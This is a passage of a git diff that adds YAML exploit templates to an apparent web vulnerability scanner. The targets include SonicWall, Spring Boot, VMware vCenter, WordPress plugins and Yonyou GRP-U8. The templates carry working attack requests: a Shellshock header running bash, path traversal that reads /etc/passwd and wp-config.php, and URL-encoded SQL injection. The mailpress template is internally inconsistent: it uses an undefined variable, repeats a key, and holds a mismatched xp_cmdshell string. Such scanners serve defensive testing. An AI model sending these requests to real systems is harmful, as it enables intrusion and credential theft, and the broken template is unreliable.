/dev/null +++ b/WebScan/pocs/sonicwall-ssl-vpn-rce.yml @@ -0,0 +1,16 @@ +name: poc-yaml-sonicwall-ssl-vpn-rce +set: + r1: randomInt(40000, 44800) + r2: randomInt(1140000, 1144800) +rules: + - method: GET + path: /cgi-bin/jarrewrite.sh + follow_redirects: false + headers: + X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}' + expression: | + response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) +detail: + author: sharecast + links: + - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ diff --git a/WebScan/pocs/springboot-env-unauth.yml b/WebScan/pocs/springboot-env-unauth.yml new file mode 100644 index 0000000..582ee48 --- /dev/null +++ b/WebScan/pocs/springboot-env-unauth.yml @@ -0,0 +1,15 @@ +name: poc-yaml-springboot-env-unauth +groups: + spring1: + - method: GET + path: /env + expression: | + response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") + spring2: + - method: GET + path: /actuator/env + expression: | + response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") +detail: + links: + - https://github.com/LandGrey/SpringBootVulExploit diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml new file mode 100644 index 0000000..d831b24 --- /dev/null +++ b/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml @@ -0,0 +1,18 @@ +name: poc-yaml-vmware-vcenter-arbitrary-file-read +groups: + win: + - method: GET + path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(b"org.postgresql.Driver") + linux: + - method: GET + path: /eam/vib?id=/etc/passwd + follow_redirects: false + expression: | + response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) +detail: + author: MrP01ntSun(https://github.com/MrPointSun) + links: + - https://t.co/LfvbyBUhF5 diff --git a/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml b/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml new file mode 100644 index 0000000..c2ed9a9 --- /dev/null +++ b/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml @@ -0,0 +1,16 @@ +name: poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972 +rules: + - method: GET + path: /ui/vropspluginui/rest/services/uploadova + follow_redirects: false + expression: | + response.status == 405 && response.body.bcontains(b"Method Not Allowed") + - method: GET + path: /ui/vropspluginui/rest/services/getstatus + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(b"States") && response.body.bcontains(b"Install Progress") +detail: + author: B1anda0(https://github.com/B1anda0) + links: + - https://swarm.ptsecurity.com/unauth-rce-vmware/ \ No newline at end of file diff --git a/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml b/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml new file mode 100644 index 0000000..5d75468 --- /dev/null +++ b/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml @@ -0,0 +1,11 @@ +name: poc-yaml-wordpress-cve-2019-19985-infoleak +rules: + - method: GET + path: "/wp-admin/admin.php?page=download_report&report=users&status=all" + follow_redirects: false + expression: > + response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"])) +detail: + author: bufsnake(https://github.com/bufsnake) + links: + - https://www.exploit-db.com/exploits/48698 diff --git a/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml b/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml new file mode 100644 index 0000000..a26f05d --- /dev/null +++ b/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml @@ -0,0 +1,13 @@ +name: poc-yaml-wordpress-ext-adaptive-images-lfi +rules: + - method: GET + path: >- + /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php + follow_redirects: false + expression: > + response.status == 200 && response.body.bcontains(b"DB_NAME") && response.body.bcontains(b"DB_USER") && response.body.bcontains(b"DB_PASSWORD") && response.body.bcontains(b"DB_HOST") +detail: + author: FiveAourThe(https://github.com/FiveAourThe) + links: + - https://www.anquanke.com/vul/id/1674598 + - https://github.com/security-kma/EXPLOITING-CVE-2019-14205 diff --git a/WebScan/pocs/wordpress-ext-mailpress-rce.yml b/WebScan/pocs/wordpress-ext-mailpress-rce.yml new file mode 100644 index 0000000..523b0f2 --- /dev/null +++ b/WebScan/pocs/wordpress-ext-mailpress-rce.yml @@ -0,0 +1,23 @@ +name: poc-yaml-wordpress-ext-mailpress-rce +set: + r: randomInt(800000000, 1000000000) + r1: randomInt(800000000, 1000000000) +rules: + - method: POST + path: "/wp-content/plugins/mailpress/mp-includes/action.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=&html=&plaintext=&mail_format=standard&autosave=1 + expression: "true" + search: | + XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell 'set/A {{r1}}*{{r2}}' + expression: | + response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) +detail: + author: MrP01ntSun(https://github.com/MrPointSun) + links: + - https://www.hackbug.net/archives/111.html diff --git a/WebScan/pocs/yonyou-grp-u8-sqli.yml b/WebScan/pocs/yonyou-grp-u8-sqli.yml new file mode 100644 index 0000000..5fd8452 --- /dev/null +++ b/WebScan/pocs/yonyou-grp-u8-sqli.yml @@ -0,0 +1,15 @@ +name: poc-yaml-yonyou-grp-u8-sqli +set: + r1: randomInt(40000, 44800) + r2: randomInt(40000, 44800) +rules: + - method: POST + path: /Proxy + body: > + cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{r1}}%2a{{r2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e + expression: | + response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) +detail: + author: 凉风(http://webkiller.cn/) + links: + - https://www.hacking8.com/bug-web/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-GRP-u8%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html \ No newline at end of file